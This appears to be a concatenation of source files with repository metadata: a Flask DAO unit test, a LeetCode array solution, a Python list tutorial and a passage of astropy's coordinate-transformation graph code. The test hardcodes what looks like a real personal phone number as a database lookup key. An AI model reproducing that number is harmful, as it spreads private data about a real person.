test/dao/test_userInfoDao.py
|
clarkchen/tiflask
|
7dee6d2de85b9b15eb233d2e4dfcda218ab4c65b
|
[
"Apache-2.0"
] | null | null | null |
test/dao/test_userInfoDao.py
|
clarkchen/tiflask
|
7dee6d2de85b9b15eb233d2e4dfcda218ab4c65b
|
[
"Apache-2.0"
] | null | null | null |
from unittest import TestCase
from tiflask.dao import UserInfoDao
class TestUserInfoDao(TestCase):
def test_get_user_article_relation(self):
dao = UserInfoDao()
phone = "18500195632"
user_info = dao.get_user_base_info(phone)
# print (user_info.phone)
self.assertIsNotNone(user_info.phone)
user_id = user_info.id
relation_info_list = dao.get_user_article_relation(user_id)
for x in relation_info_list:
print(x.article_id)
self.assertIsNotNone(x.article_id)
def test_get_user_base_info(self):
dao = UserInfoDao()
phone = "18500195632"
user_info = dao.get_user_base_info(phone)
print(user_info.phone)
self.assertIsNotNone(user_info.phone)
| 31.04
| 67
| 0.679124
|
from unittest import TestCase
from tiflask.dao import UserInfoDao
class TestUserInfoDao(TestCase):
def test_get_user_article_relation(self):
dao = UserInfoDao()
phone = "18500195632"
user_info = dao.get_user_base_info(phone)
self.assertIsNotNone(user_info.phone)
user_id = user_info.id
relation_info_list = dao.get_user_article_relation(user_id)
for x in relation_info_list:
print(x.article_id)
self.assertIsNotNone(x.article_id)
def test_get_user_base_info(self):
dao = UserInfoDao()
phone = "18500195632"
user_info = dao.get_user_base_info(phone)
print(user_info.phone)
self.assertIsNotNone(user_info.phone)
| true
| true
|
1c446ceb8906235f5651b60a7e78a640259e6170
| 300
|
py
|
Python
|
problems/remove-duplicates-from-sorted-array/solution-1.py
|
MleMoe/LeetCode-1
|
14f275ba3c8079b820808da17c4952fcf9c8253c
|
[
"MIT"
] | 2
|
2021-03-25T01:58:55.000Z
|
2021-08-06T12:47:13.000Z
|
problems/remove-duplicates-from-sorted-array/solution-1.py
|
MleMoe/LeetCode-1
|
14f275ba3c8079b820808da17c4952fcf9c8253c
|
[
"MIT"
] | 3
|
2019-08-27T13:25:42.000Z
|
2021-08-28T17:49:34.000Z
|
problems/remove-duplicates-from-sorted-array/solution-1.py
|
MleMoe/LeetCode-1
|
14f275ba3c8079b820808da17c4952fcf9c8253c
|
[
"MIT"
] | 1
|
2021-08-14T08:49:39.000Z
|
2021-08-14T08:49:39.000Z
|
class Solution:
def removeDuplicates(self, nums: [int]) -> int:
if len(nums) == 0:
return 0
order = 0
for i in range(1, len(nums)):
if nums[order] != nums[i]:
order += 1
nums[order] = nums[i]
return order + 1
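A short worked example of the two-pointer walk above, which writes each newly seen unique value just past the last one kept:

nums = [1, 1, 2, 2, 3]
k = Solution().removeDuplicates(nums)
print(k, nums[:k])  # 3 [1, 2, 3]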
| 30
| 51
| 0.453333
|
class Solution:
def removeDuplicates(self, nums: [int]) -> int:
if len(nums) == 0:
return 0
order = 0
for i in range(1, len(nums)):
if nums[order] != nums[i]:
order += 1
nums[order] = nums[i]
return order + 1
| true
| true
|
1c446cffc3bb328dbe5a01254b5550c010eec188
| 686
|
py
|
Python
|
lists.py
|
emersonnobre/python-basics
|
e4e4f17b83661e210e5379005d85364b09587593
|
[
"MIT"
] | null | null | null |
lists.py
|
emersonnobre/python-basics
|
e4e4f17b83661e210e5379005d85364b09587593
|
[
"MIT"
] | null | null | null |
lists.py
|
emersonnobre/python-basics
|
e4e4f17b83661e210e5379005d85364b09587593
|
[
"MIT"
] | null | null | null |
friends = ["Murilo", "Duda", "Rebecca"]
polymorfism = [1, False, "some text"]
numbers = [1, 34, 2, 1, 0, 34, 4, 100, 98]
# List functions
friends.extend(polymorfism) # appends the items of another list to the end of this list
friends.append("Carlinhos") # adds a value at the last position of the list
friends.insert(1, "Doja") # inserts a value at the given index, shifting the remaining items forward
friends.remove("Carlinhos") # removes the element with the given value; raises an error if it is not found
friends.pop() # removes the last value of the list
friends.extend( [1, 1] )
numbers.sort()
print(friends.count(1)) # counts the number of occurrences of the given value
print(friends)
print(numbers)
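For reference, running this script prints the following (note that count(1) does not count False, since False == 0 in Python):

3
['Murilo', 'Doja', 'Duda', 'Rebecca', 1, False, 1, 1]
[0, 1, 1, 2, 4, 34, 34, 98, 100]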
| 40.352941
| 106
| 0.739067
|
friends = ["Murilo", "Duda", "Rebecca"]
polymorfism = [1, False, "some text"]
numbers = [1, 34, 2, 1, 0, 34, 4, 100, 98]
friends.extend(polymorfism)
friends.append("Carlinhos")
friends.insert(1, "Doja")
friends.remove("Carlinhos")
friends.pop()
friends.extend( [1, 1] )
numbers.sort()
print(friends.count(1))
print(friends)
print(numbers)
| true
| true
|
1c446d71885ae3d23a95f291c3dfb10fe99cb957
| 53,754
|
py
|
Python
|
astropy/coordinates/transformations.py
|
REMeyer/astropy
|
28c49fb618538a01812e586cd07bccdf0591a6c6
|
[
"BSD-3-Clause"
] | null | null | null |
astropy/coordinates/transformations.py
|
REMeyer/astropy
|
28c49fb618538a01812e586cd07bccdf0591a6c6
|
[
"BSD-3-Clause"
] | null | null | null |
astropy/coordinates/transformations.py
|
REMeyer/astropy
|
28c49fb618538a01812e586cd07bccdf0591a6c6
|
[
"BSD-3-Clause"
] | null | null | null |
# Licensed under a 3-clause BSD style license - see LICENSE.rst
"""
This module contains a general framework for defining graphs of transformations
between coordinates, suitable for either spatial coordinates or more generalized
coordinate systems.
The fundamental idea is that each class is a node in the transformation graph,
and transitions from one node to another are defined as functions (or methods)
wrapped in transformation objects.
This module also includes more specific transformation classes for
celestial/spatial coordinate frames, generally focused around matrix-style
transformations that are typically how the algorithms are defined.
"""
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import heapq
import inspect
import subprocess
from warnings import warn
from abc import ABCMeta, abstractmethod
from collections import defaultdict, OrderedDict
import numpy as np
from .. import units as u
from ..utils.compat import suppress
from ..utils.compat.funcsigs import signature
from ..utils.exceptions import AstropyWarning
from ..extern import six
from ..extern.six.moves import range
from .representation import REPRESENTATION_CLASSES
__all__ = ['TransformGraph', 'CoordinateTransform', 'FunctionTransform',
'BaseAffineTransform', 'AffineTransform',
'StaticMatrixTransform', 'DynamicMatrixTransform',
'FunctionTransformWithFiniteDifference', 'CompositeTransform']
class TransformGraph(object):
"""
A graph representing the paths between coordinate frames.
"""
def __init__(self):
self._graph = defaultdict(dict)
self.invalidate_cache() # generates cache entries
@property
def _cached_names(self):
if self._cached_names_dct is None:
self._cached_names_dct = dct = {}
for c in self.frame_set:
nm = getattr(c, 'name', None)
if nm is not None:
dct[nm] = c
return self._cached_names_dct
@property
def frame_set(self):
"""
A `set` of all the frame classes present in this `TransformGraph`.
"""
if self._cached_frame_set is None:
self._cached_frame_set = frm_set = set()
for a in self._graph:
frm_set.add(a)
for b in self._graph[a]:
frm_set.add(b)
return self._cached_frame_set.copy()
@property
def frame_attributes(self):
"""
A `dict` of all the attributes of all frame classes in this `TransformGraph`.
"""
if self._cached_frame_attributes is None:
result = {}
for frame_cls in self.frame_set:
result.update(frame_cls.frame_attributes)
self._cached_frame_attributes = result
return self._cached_frame_attributes
def invalidate_cache(self):
"""
Invalidates the cache that stores optimizations for traversing the
transform graph. This is called automatically when transforms
are added or removed, but will need to be called manually if
weights on transforms are modified inplace.
"""
self._cached_names_dct = None
self._cached_frame_set = None
self._cached_frame_attributes = None
self._shortestpaths = {}
self._composite_cache = {}
def add_transform(self, fromsys, tosys, transform):
"""
Add a new coordinate transformation to the graph.
Parameters
----------
fromsys : class
The coordinate frame class to start from.
tosys : class
The coordinate frame class to transform into.
transform : CoordinateTransform or similar callable
The transformation object. Typically a `CoordinateTransform` object,
although it may be some other callable that is called with the same
signature.
Raises
------
TypeError
If ``fromsys`` or ``tosys`` are not classes or ``transform`` is
not callable.
"""
if not inspect.isclass(fromsys):
raise TypeError('fromsys must be a class')
if not inspect.isclass(tosys):
raise TypeError('tosys must be a class')
if not six.callable(transform):
raise TypeError('transform must be callable')
self._graph[fromsys][tosys] = transform
self.invalidate_cache()
def remove_transform(self, fromsys, tosys, transform):
"""
Removes a coordinate transform from the graph.
Parameters
----------
fromsys : class or `None`
The coordinate frame *class* to start from. If `None`,
``transform`` will be searched for and removed (``tosys`` must
also be `None`).
tosys : class or `None`
The coordinate frame *class* to transform into. If `None`,
``transform`` will be searched for and removed (``fromsys`` must
also be `None`).
transform : callable or `None`
The transformation object to be removed or `None`. If `None`
and ``tosys`` and ``fromsys`` are supplied, there will be no
check to ensure the correct object is removed.
"""
if fromsys is None or tosys is None:
if not (tosys is None and fromsys is None):
raise ValueError('fromsys and tosys must both be None if either are')
if transform is None:
raise ValueError('cannot give all Nones to remove_transform')
            # search for the requested transform by brute force and remove it
            found = False
            for a in self._graph:
                agraph = self._graph[a]
                for b in list(agraph):
                    # agraph maps tosys classes to transform objects, so the
                    # stored value (not the key) must be compared
                    if agraph[b] is transform:
                        del agraph[b]
                        found = True
                        break
                if found:
                    break
            if not found:
                raise ValueError('Could not find transform {0} in the '
                                 'graph'.format(transform))
else:
if transform is None:
self._graph[fromsys].pop(tosys, None)
else:
curr = self._graph[fromsys].get(tosys, None)
if curr is transform:
self._graph[fromsys].pop(tosys)
else:
raise ValueError('Current transform from {0} to {1} is not '
'{2}'.format(fromsys, tosys, transform))
self.invalidate_cache()
def find_shortest_path(self, fromsys, tosys):
"""
Computes the shortest distance along the transform graph from
one system to another.
Parameters
----------
fromsys : class
The coordinate frame class to start from.
tosys : class
The coordinate frame class to transform into.
Returns
-------
path : list of classes or `None`
The path from ``fromsys`` to ``tosys`` as an in-order sequence
of classes. This list includes *both* ``fromsys`` and
``tosys``. Is `None` if there is no possible path.
distance : number
The total distance/priority from ``fromsys`` to ``tosys``. If
priorities are not set this is the number of transforms
needed. Is ``inf`` if there is no possible path.
"""
inf = float('inf')
# special-case the 0 or 1-path
if tosys is fromsys:
if tosys not in self._graph[fromsys]:
# Means there's no transform necessary to go from it to itself.
return [tosys], 0
if tosys in self._graph[fromsys]:
# this will also catch the case where tosys is fromsys, but has
# a defined transform.
t = self._graph[fromsys][tosys]
return [fromsys, tosys], float(t.priority if hasattr(t, 'priority') else 1)
# otherwise, need to construct the path:
if fromsys in self._shortestpaths:
# already have a cached result
fpaths = self._shortestpaths[fromsys]
if tosys in fpaths:
return fpaths[tosys]
else:
return None, inf
# use Dijkstra's algorithm to find shortest path in all other cases
nodes = []
# first make the list of nodes
for a in self._graph:
if a not in nodes:
nodes.append(a)
for b in self._graph[a]:
if b not in nodes:
nodes.append(b)
if fromsys not in nodes or tosys not in nodes:
# fromsys or tosys are isolated or not registered, so there's
# certainly no way to get from one to the other
return None, inf
edgeweights = {}
# construct another graph that is a dict of dicts of priorities
# (used as edge weights in Dijkstra's algorithm)
for a in self._graph:
edgeweights[a] = aew = {}
agraph = self._graph[a]
for b in agraph:
aew[b] = float(agraph[b].priority if hasattr(agraph[b], 'priority') else 1)
# entries in q are [distance, count, nodeobj, pathlist]
# count is needed because in py 3.x, tie-breaking fails on the nodes.
# this way, insertion order is preserved if the weights are the same
q = [[inf, i, n, []] for i, n in enumerate(nodes) if n is not fromsys]
q.insert(0, [0, -1, fromsys, []])
# this dict will store the distance to node from ``fromsys`` and the path
result = {}
# definitely starts as a valid heap because of the insert line; from the
# node to itself is always the shortest distance
while len(q) > 0:
d, orderi, n, path = heapq.heappop(q)
if d == inf:
# everything left is unreachable from fromsys, just copy them to
# the results and jump out of the loop
result[n] = (None, d)
for d, orderi, n, path in q:
result[n] = (None, d)
break
else:
result[n] = (path, d)
path.append(n)
if n not in edgeweights:
# this is a system that can be transformed to, but not from.
continue
for n2 in edgeweights[n]:
if n2 not in result: # already visited
# find where n2 is in the heap
for i in range(len(q)):
if q[i][2] == n2:
break
else:
raise ValueError('n2 not in heap - this should be impossible!')
newd = d + edgeweights[n][n2]
if newd < q[i][0]:
q[i][0] = newd
q[i][3] = list(path)
heapq.heapify(q)
# cache for later use
self._shortestpaths[fromsys] = result
return result[tosys]
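    # Illustration of the search above (hypothetical frame classes, with
    # plain callables standing in for transform objects; callables without
    # a ``priority`` attribute default to weight 1):
    #
    #     graph = TransformGraph()
    #     graph.add_transform(FrameA, FrameB, lambda coo, fr: coo)
    #     graph.add_transform(FrameB, FrameC, lambda coo, fr: coo)
    #     graph.find_shortest_path(FrameA, FrameC)
    #     # -> ([FrameA, FrameB, FrameC], 2.0)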
def get_transform(self, fromsys, tosys):
"""
Generates and returns the `CompositeTransform` for a transformation
between two coordinate systems.
Parameters
----------
fromsys : class
The coordinate frame class to start from.
tosys : class
The coordinate frame class to transform into.
Returns
-------
trans : `CompositeTransform` or `None`
If there is a path from ``fromsys`` to ``tosys``, this is a
transform object for that path. If no path could be found, this is
`None`.
Notes
-----
This function always returns a `CompositeTransform`, because
`CompositeTransform` is slightly more adaptable in the way it can be
called than other transform classes. Specifically, it takes care of
intermediate steps of transformations in a way that is consistent with
1-hop transformations.
"""
if not inspect.isclass(fromsys):
raise TypeError('fromsys is not a class')
if not inspect.isclass(tosys):
raise TypeError('tosys is not a class')
path, distance = self.find_shortest_path(fromsys, tosys)
if path is None:
return None
transforms = []
currsys = fromsys
for p in path[1:]: # first element is fromsys so we skip it
transforms.append(self._graph[currsys][p])
currsys = p
fttuple = (fromsys, tosys)
if fttuple not in self._composite_cache:
comptrans = CompositeTransform(transforms, fromsys, tosys,
register_graph=False)
self._composite_cache[fttuple] = comptrans
return self._composite_cache[fttuple]
def lookup_name(self, name):
"""
Tries to locate the coordinate class with the provided alias.
Parameters
----------
name : str
The alias to look up.
Returns
-------
coordcls
The coordinate class corresponding to the ``name`` or `None` if
no such class exists.
"""
return self._cached_names.get(name, None)
def get_names(self):
"""
Returns all available transform names. They will all be
valid arguments to `lookup_name`.
Returns
-------
nms : list
The aliases for coordinate systems.
"""
return list(six.iterkeys(self._cached_names))
def to_dot_graph(self, priorities=True, addnodes=[], savefn=None,
savelayout='plain', saveformat=None, color_edges=True):
"""
Converts this transform graph to the graphviz_ DOT format.
Optionally saves it (requires `graphviz`_ be installed and on your path).
.. _graphviz: http://www.graphviz.org/
Parameters
----------
priorities : bool
If `True`, show the priority values for each transform. Otherwise,
            they will not be included in the graph.
addnodes : sequence of str
Additional coordinate systems to add (this can include systems
already in the transform graph, but they will only appear once).
savefn : `None` or str
The file name to save this graph to or `None` to not save
to a file.
savelayout : str
The graphviz program to use to layout the graph (see
graphviz_ for details) or 'plain' to just save the DOT graph
content. Ignored if ``savefn`` is `None`.
saveformat : str
The graphviz output format. (e.g. the ``-Txxx`` option for
the command line program - see graphviz docs for details).
Ignored if ``savefn`` is `None`.
color_edges : bool
Color the edges between two nodes (frames) based on the type of
transform. ``FunctionTransform``: red, ``StaticMatrixTransform``:
blue, ``DynamicMatrixTransform``: green.
Returns
-------
dotgraph : str
A string with the DOT format graph.
"""
nodes = []
# find the node names
for a in self._graph:
if a not in nodes:
nodes.append(a)
for b in self._graph[a]:
if b not in nodes:
nodes.append(b)
for node in addnodes:
if node not in nodes:
nodes.append(node)
nodenames = []
invclsaliases = dict([(v, k) for k, v in six.iteritems(self._cached_names)])
for n in nodes:
if n in invclsaliases:
nodenames.append('{0} [shape=oval label="{0}\\n`{1}`"]'.format(n.__name__, invclsaliases[n]))
else:
nodenames.append(n.__name__ + '[ shape=oval ]')
edgenames = []
# Now the edges
for a in self._graph:
agraph = self._graph[a]
for b in agraph:
transform = agraph[b]
pri = transform.priority if hasattr(transform, 'priority') else 1
color = trans_to_color[transform.__class__] if color_edges else 'black'
edgenames.append((a.__name__, b.__name__, pri, color))
# generate simple dot format graph
lines = ['digraph AstropyCoordinateTransformGraph {']
lines.append('; '.join(nodenames) + ';')
for enm1, enm2, weights, color in edgenames:
labelstr_fmt = '[ {0} {1} ]'
if priorities:
priority_part = 'label = "{0}"'.format(weights)
else:
priority_part = ''
color_part = 'color = "{0}"'.format(color)
labelstr = labelstr_fmt.format(priority_part, color_part)
lines.append('{0} -> {1}{2};'.format(enm1, enm2, labelstr))
lines.append('')
lines.append('overlap=false')
lines.append('}')
dotgraph = '\n'.join(lines)
if savefn is not None:
if savelayout == 'plain':
with open(savefn, 'w') as f:
f.write(dotgraph)
else:
args = [savelayout]
if saveformat is not None:
args.append('-T' + saveformat)
proc = subprocess.Popen(args, stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = proc.communicate(dotgraph)
if proc.returncode != 0:
raise IOError('problem running graphviz: \n' + stderr)
with open(savefn, 'w') as f:
f.write(stdout)
return dotgraph
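    # For example, ``graph.to_dot_graph(savefn='transforms.dot')`` writes the
    # DOT source as-is, while ``savelayout='dot', saveformat='svg'`` pipes it
    # through the graphviz ``dot`` program (file names here are hypothetical).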
def to_networkx_graph(self):
"""
Converts this transform graph into a networkx graph.
.. note::
You must have the `networkx <http://networkx.lanl.gov/>`_
package installed for this to work.
Returns
-------
nxgraph : `networkx.Graph <http://networkx.lanl.gov/reference/classes.graph.html>`_
This `TransformGraph` as a `networkx.Graph`_.
"""
import networkx as nx
nxgraph = nx.Graph()
# first make the nodes
for a in self._graph:
if a not in nxgraph:
nxgraph.add_node(a)
for b in self._graph[a]:
if b not in nxgraph:
nxgraph.add_node(b)
# Now the edges
for a in self._graph:
agraph = self._graph[a]
for b in agraph:
transform = agraph[b]
pri = transform.priority if hasattr(transform, 'priority') else 1
color = trans_to_color[transform.__class__]
nxgraph.add_edge(a, b, weight=pri, color=color)
return nxgraph
def transform(self, transcls, fromsys, tosys, priority=1, **kwargs):
"""
A function decorator for defining transformations.
.. note::
If decorating a static method of a class, ``@staticmethod``
should be added *above* this decorator.
Parameters
----------
transcls : class
The class of the transformation object to create.
fromsys : class
The coordinate frame class to start from.
tosys : class
The coordinate frame class to transform into.
priority : number
            The priority of this transform when finding the shortest
coordinate transform path - large numbers are lower priorities.
Additional keyword arguments are passed into the ``transcls``
constructor.
Returns
-------
deco : function
A function that can be called on another function as a decorator
(see example).
Notes
-----
This decorator assumes the first argument of the ``transcls``
initializer accepts a callable, and that the second and third
are ``fromsys`` and ``tosys``. If this is not true, you should just
initialize the class manually and use `add_transform` instead of
using this decorator.
Examples
--------
::
graph = TransformGraph()
class Frame1(BaseCoordinateFrame):
...
class Frame2(BaseCoordinateFrame):
...
@graph.transform(FunctionTransform, Frame1, Frame2)
def f1_to_f2(f1_obj):
... do something with f1_obj ...
return f2_obj
"""
def deco(func):
# this doesn't do anything directly with the transform because
# ``register_graph=self`` stores it in the transform graph
# automatically
transcls(func, fromsys, tosys, priority=priority,
register_graph=self, **kwargs)
return func
return deco
# <-------------------Define the builtin transform classes-------------------->
@six.add_metaclass(ABCMeta)
class CoordinateTransform(object):
"""
An object that transforms a coordinate from one system to another.
Subclasses must implement `__call__` with the provided signature.
They should also call this superclass's ``__init__`` in their
``__init__``.
Parameters
----------
fromsys : class
The coordinate frame class to start from.
tosys : class
The coordinate frame class to transform into.
priority : number
        The priority of this transform when finding the shortest
coordinate transform path - large numbers are lower priorities.
register_graph : `TransformGraph` or `None`
A graph to register this transformation with on creation, or
`None` to leave it unregistered.
"""
def __init__(self, fromsys, tosys, priority=1, register_graph=None):
if not inspect.isclass(fromsys):
raise TypeError('fromsys must be a class')
if not inspect.isclass(tosys):
raise TypeError('tosys must be a class')
self.fromsys = fromsys
self.tosys = tosys
self.priority = float(priority)
if register_graph:
# this will do the type-checking when it adds to the graph
self.register(register_graph)
else:
if not inspect.isclass(fromsys) or not inspect.isclass(tosys):
raise TypeError('fromsys and tosys must be classes')
self.overlapping_frame_attr_names = overlap = []
if (hasattr(fromsys, 'get_frame_attr_names') and
hasattr(tosys, 'get_frame_attr_names')):
# the if statement is there so that non-frame things might be usable
# if it makes sense
for from_nm in fromsys.get_frame_attr_names():
if from_nm in tosys.get_frame_attr_names():
overlap.append(from_nm)
def register(self, graph):
"""
Add this transformation to the requested Transformation graph,
replacing anything already connecting these two coordinates.
Parameters
----------
graph : a TransformGraph object
The graph to register this transformation with.
"""
graph.add_transform(self.fromsys, self.tosys, self)
def unregister(self, graph):
"""
Remove this transformation from the requested transformation
graph.
Parameters
----------
graph : a TransformGraph object
The graph to unregister this transformation from.
Raises
------
ValueError
If this is not currently in the transform graph.
"""
graph.remove_transform(self.fromsys, self.tosys, self)
@abstractmethod
def __call__(self, fromcoord, toframe):
"""
Does the actual coordinate transformation from the ``fromsys`` class to
the ``tosys`` class.
Parameters
----------
fromcoord : fromsys object
An object of class matching ``fromsys`` that is to be transformed.
toframe : object
An object that has the attributes necessary to fully specify the
frame. That is, it must have attributes with names that match the
keys of the dictionary that ``tosys.get_frame_attr_names()``
returns. Typically this is of class ``tosys``, but it *might* be
some other class as long as it has the appropriate attributes.
Returns
-------
tocoord : tosys object
The new coordinate after the transform has been applied.
"""
class FunctionTransform(CoordinateTransform):
"""
A coordinate transformation defined by a function that accepts a
coordinate object and returns the transformed coordinate object.
Parameters
----------
func : callable
The transformation function. Should have a call signature
        ``func(fromcoord, toframe)``. Note that, unlike
`CoordinateTransform.__call__`, ``toframe`` is assumed to be of type
``tosys`` for this function.
fromsys : class
The coordinate frame class to start from.
tosys : class
The coordinate frame class to transform into.
priority : number
        The priority of this transform when finding the shortest
coordinate transform path - large numbers are lower priorities.
register_graph : `TransformGraph` or `None`
A graph to register this transformation with on creation, or
`None` to leave it unregistered.
Raises
------
TypeError
If ``func`` is not callable.
ValueError
If ``func`` cannot accept two arguments.
"""
def __init__(self, func, fromsys, tosys, priority=1, register_graph=None):
if not six.callable(func):
raise TypeError('func must be callable')
        with suppress(TypeError):
            sig = signature(func)
            params = list(sig.parameters.values())
            # ``len()`` of a generator expression raises TypeError, which the
            # enclosing ``suppress`` silently swallows, skipping this check
            # entirely, so count with a list comprehension instead. Ordinary
            # ``def f(a, b)`` parameters are POSITIONAL_OR_KEYWORD, so they
            # must be counted alongside POSITIONAL_ONLY ones.
            npos = len([p for p in params
                        if p.kind in (p.POSITIONAL_ONLY,
                                      p.POSITIONAL_OR_KEYWORD)])
            if (npos != 2 and
                    not any(p.kind == p.VAR_POSITIONAL for p in params)):
                raise ValueError('provided function does not accept two arguments')
self.func = func
super(FunctionTransform, self).__init__(fromsys, tosys,
priority=priority, register_graph=register_graph)
def __call__(self, fromcoord, toframe):
res = self.func(fromcoord, toframe)
if not isinstance(res, self.tosys):
raise TypeError('the transformation function yielded {0} but '
'should have been of type {1}'.format(res, self.tosys))
if fromcoord.data.differentials and not res.data.differentials:
warn("Applied a FunctionTransform to a coordinate frame with "
"differentials, but the FunctionTransform does not handle "
"differentials, so they have been dropped.", AstropyWarning)
return res
class FunctionTransformWithFiniteDifference(FunctionTransform):
r"""
A coordinate transformation that works like a `FunctionTransform`, but
computes velocity shifts based on the finite-difference relative to one of
the frame attributes. Note that the transform function should *not* change
the differential at all in this case, as any differentials will be
overridden.
When a differential is in the from coordinate, the finite difference
    calculation has two components. The first part is simply the existing
    differential, re-oriented (using finite-difference techniques) to
    point in the direction the velocity vector has in the *new* frame. The
second component is the "induced" velocity. That is, the velocity
intrinsic to the frame itself, estimated by shifting the frame using the
``finite_difference_frameattr_name`` frame attribute a small amount
(``finite_difference_dt``) in time and re-calculating the position.
Parameters
----------
finite_difference_frameattr_name : str or None
The name of the frame attribute on the frames to use for the finite
difference. Both the to and the from frame will be checked for this
attribute, but only one needs to have it. If None, no velocity
component induced from the frame itself will be included - only the
        re-orientation of any existing differential.
finite_difference_dt : `~astropy.units.Quantity` or callable
If a quantity, this is the size of the differential used to do the
finite difference. If a callable, should accept
``(fromcoord, toframe)`` and return the ``dt`` value.
symmetric_finite_difference : bool
If True, the finite difference is computed as
        :math:`\frac{x(t + \Delta t / 2) - x(t - \Delta t / 2)}{\Delta t}`, or
if False, :math:`\frac{x(t + \Delta t) - x(t)}{\Delta t}`. The latter
case has slightly better performance (and more stable finite difference
behavior).
All other parameters are identical to the initializer for
`FunctionTransform`.
"""
def __init__(self, func, fromsys, tosys, priority=1, register_graph=None,
finite_difference_frameattr_name='obstime',
finite_difference_dt=1*u.second,
symmetric_finite_difference=True):
super(FunctionTransformWithFiniteDifference, self).__init__(func,
fromsys, tosys, priority, register_graph)
self.finite_difference_frameattr_name = finite_difference_frameattr_name
self.finite_difference_dt = finite_difference_dt
self.symmetric_finite_difference = symmetric_finite_difference
@property
def finite_difference_frameattr_name(self):
return self._finite_difference_frameattr_name
@finite_difference_frameattr_name.setter
def finite_difference_frameattr_name(self, value):
if value is None:
self._diff_attr_in_fromsys = self._diff_attr_in_tosys = False
else:
diff_attr_in_fromsys = value in self.fromsys.frame_attributes
diff_attr_in_tosys = value in self.tosys.frame_attributes
if diff_attr_in_fromsys or diff_attr_in_tosys:
self._diff_attr_in_fromsys = diff_attr_in_fromsys
self._diff_attr_in_tosys = diff_attr_in_tosys
else:
raise ValueError('Frame attribute name {} is not a frame '
'attribute of {} or {}'.format(value,
self.fromsys,
self.tosys))
self._finite_difference_frameattr_name = value
def __call__(self, fromcoord, toframe):
from .representation import (CartesianRepresentation,
CartesianDifferential)
supcall = self.func
if fromcoord.data.differentials:
# this is the finite difference case
if callable(self.finite_difference_dt):
dt = self.finite_difference_dt(fromcoord, toframe)
else:
dt = self.finite_difference_dt
halfdt = dt/2
from_diffless = fromcoord.realize_frame(fromcoord.data.without_differentials())
reprwithoutdiff = supcall(from_diffless, toframe)
# first we use the existing differential to compute an offset due to
# the already-existing velocity, but in the new frame
fromcoord_cart = fromcoord.cartesian
if self.symmetric_finite_difference:
fwdxyz = (fromcoord_cart.xyz +
fromcoord_cart.differentials['s'].d_xyz*halfdt)
fwd = supcall(fromcoord.realize_frame(CartesianRepresentation(fwdxyz)), toframe)
backxyz = (fromcoord_cart.xyz -
fromcoord_cart.differentials['s'].d_xyz*halfdt)
back = supcall(fromcoord.realize_frame(CartesianRepresentation(backxyz)), toframe)
else:
fwdxyz = (fromcoord_cart.xyz +
fromcoord_cart.differentials['s'].d_xyz*dt)
fwd = supcall(fromcoord.realize_frame(CartesianRepresentation(fwdxyz)), toframe)
back = reprwithoutdiff
diffxyz = (fwd.cartesian - back.cartesian).xyz / dt
# now we compute the "induced" velocities due to any movement in
# the frame itself over time
attrname = self.finite_difference_frameattr_name
if attrname is not None:
if self.symmetric_finite_difference:
if self._diff_attr_in_fromsys:
kws = {attrname: getattr(from_diffless, attrname) + halfdt}
from_diffless_fwd = from_diffless.replicate(**kws)
else:
from_diffless_fwd = from_diffless
if self._diff_attr_in_tosys:
kws = {attrname: getattr(toframe, attrname) + halfdt}
fwd_frame = toframe.replicate_without_data(**kws)
else:
fwd_frame = toframe
fwd = supcall(from_diffless_fwd, fwd_frame)
if self._diff_attr_in_fromsys:
kws = {attrname: getattr(from_diffless, attrname) - halfdt}
from_diffless_back = from_diffless.replicate(**kws)
else:
from_diffless_back = from_diffless
if self._diff_attr_in_tosys:
kws = {attrname: getattr(toframe, attrname) - halfdt}
back_frame = toframe.replicate_without_data(**kws)
else:
back_frame = toframe
back = supcall(from_diffless_back, back_frame)
else:
if self._diff_attr_in_fromsys:
kws = {attrname: getattr(from_diffless, attrname) + dt}
from_diffless_fwd = from_diffless.replicate(**kws)
else:
from_diffless_fwd = from_diffless
if self._diff_attr_in_tosys:
kws = {attrname: getattr(toframe, attrname) + dt}
fwd_frame = toframe.replicate_without_data(**kws)
else:
fwd_frame = toframe
fwd = supcall(from_diffless_fwd, fwd_frame)
back = reprwithoutdiff
diffxyz += (fwd.cartesian - back.cartesian).xyz / dt
newdiff = CartesianDifferential(diffxyz)
reprwithdiff = reprwithoutdiff.data.to_cartesian().with_differentials(newdiff)
return reprwithoutdiff.realize_frame(reprwithdiff)
else:
return supcall(fromcoord, toframe)
class BaseAffineTransform(CoordinateTransform):
"""Base class for common functionality between the ``AffineTransform``-type
subclasses.
This base class is needed because ``AffineTransform`` and the matrix
transform classes share the ``_apply_transform()`` method, but have
different ``__call__()`` methods. ``StaticMatrixTransform`` passes in a
matrix stored as a class attribute, and both of the matrix transforms pass
in ``None`` for the offset. Hence, user subclasses would likely want to
subclass this (rather than ``AffineTransform``) if they want to provide
alternative transformations using this machinery.
"""
def _apply_transform(self, fromcoord, matrix, offset):
from .representation import (UnitSphericalRepresentation,
CartesianDifferential,
SphericalDifferential,
SphericalCosLatDifferential,
RadialDifferential)
data = fromcoord.data
has_velocity = 's' in data.differentials
# list of unit differentials
_unit_diffs = (SphericalDifferential._unit_differential,
SphericalCosLatDifferential._unit_differential)
unit_vel_diff = (has_velocity and
isinstance(data.differentials['s'], _unit_diffs))
rad_vel_diff = (has_velocity and
isinstance(data.differentials['s'], RadialDifferential))
# Some initial checking to short-circuit doing any re-representation if
# we're going to fail anyways:
if isinstance(data, UnitSphericalRepresentation) and offset is not None:
raise TypeError("Position information stored on coordinate frame "
"is insufficient to do a full-space position "
"transformation (representation class: {0})"
.format(data.__class__))
elif (has_velocity and (unit_vel_diff or rad_vel_diff) and
offset is not None and 's' in offset.differentials):
# Coordinate has a velocity, but it is not a full-space velocity
# that we need to do a velocity offset
raise TypeError("Velocity information stored on coordinate frame "
"is insufficient to do a full-space velocity "
"transformation (differential class: {0})"
.format(data.differentials['s'].__class__))
elif len(data.differentials) > 1:
# We should never get here because the frame initializer shouldn't
# allow more differentials, but this just adds protection for
# subclasses that somehow skip the checks
raise ValueError("Representation passed to AffineTransform contains"
" multiple associated differentials. Only a single"
" differential with velocity units is presently"
" supported (differentials: {0})."
.format(str(data.differentials)))
# If the representation is a UnitSphericalRepresentation, and this is
# just a MatrixTransform, we have to try to turn the differential into a
# Unit version of the differential (if no radial velocity) or a
# sphericaldifferential with zero proper motion (if only a radial
# velocity) so that the matrix operation works
if (has_velocity and isinstance(data, UnitSphericalRepresentation) and
not unit_vel_diff and not rad_vel_diff):
# retrieve just velocity differential
